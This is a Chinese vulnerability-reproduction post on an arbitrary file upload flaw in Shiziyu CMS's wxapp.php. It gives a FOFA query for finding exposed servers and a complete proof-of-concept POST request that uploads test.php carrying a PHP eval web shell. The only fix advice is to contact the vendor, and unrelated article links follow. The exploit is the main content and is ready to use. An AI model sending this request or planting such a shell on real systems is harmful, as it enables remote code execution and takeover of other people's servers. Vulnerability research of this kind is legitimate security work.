【漏洞复现】狮子鱼CMS文件上传漏洞(wxapp.php)

Nx01 产品简介

狮子鱼CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。

Nx02 漏洞描述

狮子鱼CMS wxapp.php文件存在任意文件上传漏洞,攻击者可能利用这个漏洞上传恶意文件并执行恶意代码。

Nx03 产品主页

fofa-query: body="/seller.php?s=/Public/login"

Nx04 漏洞复现

POC:

复制代码
POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs

------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="upfile"; filename="test.php"
Content-Type: http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/gif

<?php @eval($_POST['test']);?>
------WebKitFormBoundary8UaANmWAgM4BqBSs--

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
ljs6482739516 分钟前
Linux 网络常用命令与端口基础详解
linux·网络·php
Ai拆代码的曹操6 分钟前
TCP 握手丢包分析:客户端连接超时、服务端无日志的场景排查实践
网络·网络协议·tcp/ip
头茬韭菜12 分钟前
4.1-4.2 工具注册 — Fail-Closed 类型安全设计与四层工具架构
java·安全·架构
白帽小阳17 分钟前
Typora插件开发指南:打造专属IDE式写作环境
c语言·网络·python·网络安全·github·pygame·护网行动
网络小白不怕黑19 分钟前
13.SSH服务相关配置
服务器·网络·ssh
科技侃谈1 小时前
曹操充电:以“蚂蚁站“模式破局县域补能,让下沉市场充电网络更轻、更快、更可持续
网络
Sirius Wu1 小时前
OpenClaw SubAgent 三层安全约束完整详解
人工智能·安全·ai·架构·aigc
昊星自动化1 小时前
昊星自动化携智慧实验室环境管理系统亮相2026 青岛蓝博化工装备展,助力实验室安全节能双效协同
安全·自动化·实验室建设·文丘里阀·房间通风控制
makise-1 小时前
剑星2026最新版免费下载+修改器
网络·游戏
Bruce_Liuxiaowei1 小时前
一次内网横向移动实战:从一个 5900 端口到穿越防火墙
运维·网络·安全